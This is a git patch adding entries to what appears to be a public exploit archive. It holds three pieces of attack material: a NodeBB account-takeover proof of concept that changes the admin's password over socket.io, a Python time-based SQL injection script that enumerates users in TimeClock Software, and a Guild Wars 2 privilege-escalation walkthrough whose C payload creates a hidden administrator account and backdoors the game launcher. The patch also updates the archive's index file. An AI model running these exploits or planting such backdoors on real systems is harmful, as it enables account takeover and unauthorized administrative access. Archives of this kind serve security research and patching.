From a3aad6c41a91dfebf31aa4f572c50d82e7c8a783 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 15 Oct 2020 05:02:06 +0000 Subject: [PATCH] DB: 2020-10-15 3 changes to exploits/shellcodes Guild Wars 2 - Insecure Folder Permissions TimeClock Software 0.995 - Multiple SQL Injections TimeClock Software 0.995 - (Authenticated ) Multiple SQL Injections TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection NodeBB Forum 1.12.2-1.14.2 - Account Takeover --- exploits/multiple/webapps/48875.txt | 21 ++++++ exploits/php/webapps/48874.py | 50 +++++++++++++ exploits/windows/local/48876.txt | 107 ++++++++++++++++++++++++++++ files_exploits.csv | 5 +- 4 files changed, 182 insertions(+), 1 deletion(-) create mode 100644 exploits/multiple/webapps/48875.txt create mode 100755 exploits/php/webapps/48874.py create mode 100644 exploits/windows/local/48876.txt diff --git a/exploits/multiple/webapps/48875.txt b/exploits/multiple/webapps/48875.txt new file mode 100644 index 000000000..1d6455004 --- /dev/null +++ b/exploits/multiple/webapps/48875.txt @@ -0,0 +1,21 @@ +# Exploit Title: NodeBB Forum 1.12.2-1.14.2 - Account Takeover +# Date: 2020-08-18 +# Exploit Author: Muhammed Eren Uygun +# Vendor Homepage: https://nodebb.org/ +# Software Link: https://github.com/NodeBB/NodeBB +# Version: 1.12.2-1.14.2 +# Tested on: Linux +# CVE : CVE-2020-15149 - https://github.com/NodeBB/NodeBB/security/advisories/GHSA-hr66-c8pg-5mg7 +Impact: +---------------------- +A bug in this validation logic made it possible to change the password of any user on a running NodeBB forum by sending a specially crafted socket.io call to the server. This could lead to a privilege escalation event due via an account takeover. + +Bug PoC: +---------------------- +Blog: https://medium.com/bugbountywriteup/privilege-escalation-via-account-takeover-on-nodebb-forum-software-512-a593a7b1b4a4 +1- Create a user +2- Go to password change page +3- Change password with proxy +427["user.changePassword",("currentPassword":"Test.12345!","newPassword":"Admin123!","uid":5)]) +4- Replace the uid on the request with 1, which is the uid value of the admin user, and send the request. +5- So you can login with this password to admin user. \ No newline at end of file diff --git a/exploits/php/webapps/48874.py b/exploits/php/webapps/48874.py new file mode 100755 index 000000000..997912326 --- /dev/null +++ b/exploits/php/webapps/48874.py @@ -0,0 +1,50 @@ +#!/usr/bin/python3 + +# Exploit Title: TimeClock Software 1.01 Authenticated Time-Based SQL Injection +# Date: July 21, 2020 +# Exploit Author: François Bibeau +# Co Author: Tyler Butler, http://tbutler.org, https://twitter.com/tbutler0x90 +# Vendor Homepage: http://timeclock-software.net/ +# Software Link: http://timeclock-software.net/timeclock-download.php +# Version: 1.01 +# Tested on: Ubuntu 18.04.3 (LTS) x64, mysql 5.7, php 7.2.1-apache + +import time +import requests + + +login_url = 'http://159.203.41.34/login_action.php' # Ensure to change ip to match target +login_data = {'username':'fred','password':'fred','submit':'Log In'} +headers = {'User-Agent': 'Mozilla/5.0'} + +# init session & login +session = requests.Session() +session.post(login_url,headers=headers,data=login_data) + +# static list provided for PoC, could use a text file +users = ['john','bill','tim','fred','garry','sid','admin'] + +for user in users: + url = "http://159.203.41.34/add_entry.php" + payload = f"' OR IF((SELECT username FROM user_info WHERE username='{user}')='{user}', SLEEP(5), NULL)='" + + data = {'data_month': '1', + 'data_day': '1', + 'data_year': '1', + 'type_id': '5', + 'hours': '1', + 'notes': payload, + 'submit': 'Add'} + + print(f'Checking user {user}... ', end = '') + + start = time.time() + response = session.post(url,data=data) + end = time.time() + + delay = end - start + + if delay > 5: + print('User found!') + else: + print('') \ No newline at end of file diff --git a/exploits/windows/local/48876.txt b/exploits/windows/local/48876.txt new file mode 100644 index 000000000..154ea352d --- /dev/null +++ b/exploits/windows/local/48876.txt @@ -0,0 +1,107 @@ +# Exploit Title: Guild Wars 2 - Insecure Folder Permissions +# Date: 2020-10-09 +# Exploit Author: George Tsimpidas +# Software Link : https://account.arena.net/welcome +# Version Build : 106915 +# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362 +# Category: local + + + +Vulnerability Description: + +Guild Wars 2 Launcher (Gw2-64.exe) suffers from an elevation of privileges +vulnerability which can be used by a simple user that can change the +executable file +with a binary of choice. The vulnerability exist due to the improper +permissions, +with the 'F' flag (Full) for 'Everyone' group, making the entire directory +'Guild Wars 2' and its files and sub-dirs world-writable. + + +# Local Privilege Escalation Proof of Concept + + +D:\icacls "Guild Wars 2" +Guild Wars 2 Everyone:(F) +Everyone:(OI)(CI)(IO)(M,WDAC,WO,DC) +BUILTIN\Administrators:(I)(F) +BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) +NT AUTHORITY\SYSTEM:(I)(F) +NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) +NT AUTHORITY\Authenticated Users:(I)(M) +NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) +BUILTIN\Users:(I)(RX) +BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) + +## Insecure File Permission + +D:\Guild Wars 2icacls Gw2-64.exe +Gw2-64.exe Everyone:(F) +Everyone:(I)(F) +BUILTIN\Administrators:(I)(F) +NT AUTHORITY\SYSTEM:(I)(F) +NT AUTHORITY\Authenticated Users:(I)(M) +BUILTIN\Users:(I)(RX) + + + +#0. Download & install + +#1. Create low privileged user & change to the user +## As admin + +C:\net user lowpriv Password123! /add +C:\net user lowpriv | findstr /i "Membership Name" | findstr /v "Full" +User name lowpriv +Local Group Memberships *Users +Global Group memberships *None + +#2. Move the Service EXE to a new name + +D:\Guild Wars 2whoami +lowpriv + +D:\Guild Wars 2move Gw2-64.exe Gw2-64.frey.exe +1 file(s) moved. + +#3. Create malicious binary on kali linux +## Add Admin User C Code + +kali# cat addAdmin.c +int main(void){ +system("net user placebo mypassword /add"); +system("net localgroup Administrators placebo /add"); +WinExec("D:\\Guild Wars 2\\Gw2-64.frey.exe",0); +return 0; +} + +## Compile Code +kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Gw2-64.exe + +#4. Transfer created 'Gw2-64' to the Windows Host + +#5. Move the created 'Gw2-64' binary to the 'D:\Guild Wars 2' Folder + +D:\Guild Wars 2move C:\Users\lowpriv\Downloads\Gw2-64.exe . + +#6. Check that exploit admin user doesn't exists + +D:\Guild Wars 2net user placebo + +The user name could not be found + +#6. Reboot the Computer + +D:\Guild Wars 2shutdown /r + +#7. Login & now start the Guild Wars 2 Game, back doored launcher will be +executed, and the user placebo will be created, and added to the +Administrators group. + +C:\Users\lowprivnet user placebo | findstr /i "Membership Name" | findstr +/v "Full" + +User name placebo +Local Group Memberships *Administrators *Users +Global Group memberships *None \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e1832f202..0a0108017 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10388,6 +10388,7 @@ id,file,description,date,author,type,platform,port 48839,exploits/windows/local/48839.py,"BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)",2020-09-29,"Christian Vierschilling",local,windows, 48840,exploits/windows/local/48840.py,"CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)",2020-09-29,boku,local,windows, 48873,exploits/windows/local/48873.txt,"Battle.Net 1.27.1.12428 - Insecure File Permissions",2020-10-13,"George Tsimpidas",local,windows, +48876,exploits/windows/local/48876.txt,"Guild Wars 2 - Insecure Folder Permissions",2020-10-14,"George Tsimpidas",local,windows, 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux, 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows, 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows, @@ -38881,7 +38882,7 @@ id,file,description,date,author,type,platform,port 39394,exploits/multiple/webapps/39394.txt,"ManageEngine EventLog Analyzer 4.0 < 10 - Privilege Escalation",2016-02-01,GraphX,webapps,multiple,80 39399,exploits/multiple/webapps/39399.txt,"Manage Engine Network Configuration Manager Build 11000 - Cross-Site Request Forgery",2016-02-02,"Kaustubh G. Padwad",webapps,multiple, 39402,exploits/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",webapps,jsp,80 -39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80 +39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - (Authenticated ) Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80 39405,exploits/jsp/webapps/39405.py,"Jive Forums 5.5.25 - Directory Traversal",2016-02-03,ZhaoHuAn,webapps,jsp,80 39407,exploits/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Persistent Cross-Site Scripting",2016-02-03,Portcullis,webapps,hardware, 39408,exploits/hardware/webapps/39408.txt,"GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",webapps,hardware, @@ -40692,6 +40693,8 @@ id,file,description,date,author,type,platform,port 48870,exploits/php/webapps/48870.txt,"Online Students Management System 1.0 - 'username' SQL Injections",2020-10-12,"George Tsimpidas",webapps,php, 48871,exploits/hardware/webapps/48871.txt,"Cisco ASA and FTD 9.6.4.42 - Path Traversal",2020-10-12,3ndG4me,webapps,hardware, 48872,exploits/php/webapps/48872.txt,"berliCRM 1.0.24 - 'src_record' SQL Injection",2020-10-13,"Ahmet Ümit BAYRAM",webapps,php, +48874,exploits/php/webapps/48874.py,"TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection",2020-07-23,"François Bibeau",webapps,php, +48875,exploits/multiple/webapps/48875.txt,"NodeBB Forum 1.12.2-1.14.2 - Account Takeover",2020-10-14,"Muhammed Eren Uygun",webapps,multiple, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,